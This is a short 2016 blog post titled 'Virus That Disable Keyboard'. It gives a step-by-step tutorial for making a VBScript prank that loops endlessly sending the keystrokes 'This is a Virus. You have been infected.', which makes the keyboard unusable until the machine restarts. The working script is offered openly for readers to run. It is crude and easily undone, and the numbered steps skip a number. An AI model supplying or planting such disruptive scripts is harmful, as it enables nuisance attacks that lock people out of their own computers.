Tuesday 12 April 2016

Virus That Disable Keyboard

Virus That Disable Keyboard

Today, We are going to create a "Virus" that disable keyboard.


We Requied Only:-

1.A computer.
2.Notepad.

Steps to Create virus

1. Open Notepad.
_______________CODE__________________
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop
_______________________________________

3. Save the Notepad File with (.vbs) 
4. Open the Notepad file.
5. You can See that Your keyboard is not working.



How to solve this problem....?

Just only Restart your Computer.


____________________________Thankyou________________________________

No comments:

Post a Comment